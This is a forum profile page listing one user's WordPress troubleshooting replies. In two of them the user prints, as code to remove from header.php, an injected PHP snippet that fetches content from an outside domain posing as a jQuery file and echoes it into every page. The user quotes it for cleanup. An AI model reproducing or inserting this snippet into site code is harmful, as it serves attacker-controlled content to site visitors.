dfagredam
Forum Replies Created
-
Forum: Plugins
In reply to: [Easy Theme and Plugin Upgrades] Not working WP 4.5The problem is due to a conflict with Visual Composer. I am having similar issues with another template using Visual Composer 4.9. If you bought the template from envato, the best thing is to contact the support for your theme and see what they are doing about it.
Forum: Fixing WordPress
In reply to: Issue with WP DashboardI am also having issues on dashboard, it starts flickering, and some options disappear. I have to refresh constantly in order to get rid of the problem.
Forum: Fixing WordPress
In reply to: HTTP Error When Uploading MP3s Ony – Pics Upload OKHello. I was having a similar problem but it was due to a template issue and not a media library issue. what I did was to go to the theme options, save again and then the media uploader started working again. Hope it works.
Forum: Fixing WordPress
In reply to: Second Time getting this errorWell, I was going nuts over this error. And here is what i did, the last plugin that I installed before this started happening was the seo pack. so I erased that. The same thing I did with all of the plugins that i was not using. last thing that I did and that is working fine is the code suppression that I have posted before. The way I did it is with the editor inside of wordpress. Erase that piece of code and hope it works for you. !!!!!!Copy all of the code you have in there just in case and save it before attemping to do this. !!!!!
<?php
if(function_exists(‘curl_init’))
{
$url = “https://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js”;
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo “$data”;
}
?>
Forum: Fixing WordPress
In reply to: Second Time getting this errorChances are that if you are getting this error it is inside your code somewhere. My advice is get inside via ftp and get the file from the server, then do a search inside the file with notepad++ or coda. See what you can find. Good luck, it is annoying
Forum: Fixing WordPress
In reply to: Second Time getting this errorHere is the solution I am testing right now, just in case someone else need it.
Just be careful not to erase any other piece of code.remove from the header.php:
<?phpif(function_exists(‘curl_init’))
{
$url = “https://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js”;
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo “$data”;
}
?>
Forum: Fixing WordPress
In reply to: Second Time getting this errorCan you do Updates on yours?
Forum: Fixing WordPress
In reply to: Second Time getting this errorWell I don’t really know what to do. First I started deactivating some plugins and It worked well for one hour. It is really weird because the website works fine, but it shows that nasty message on top. I am working with chrome today, but yesterday it showed on explorer as well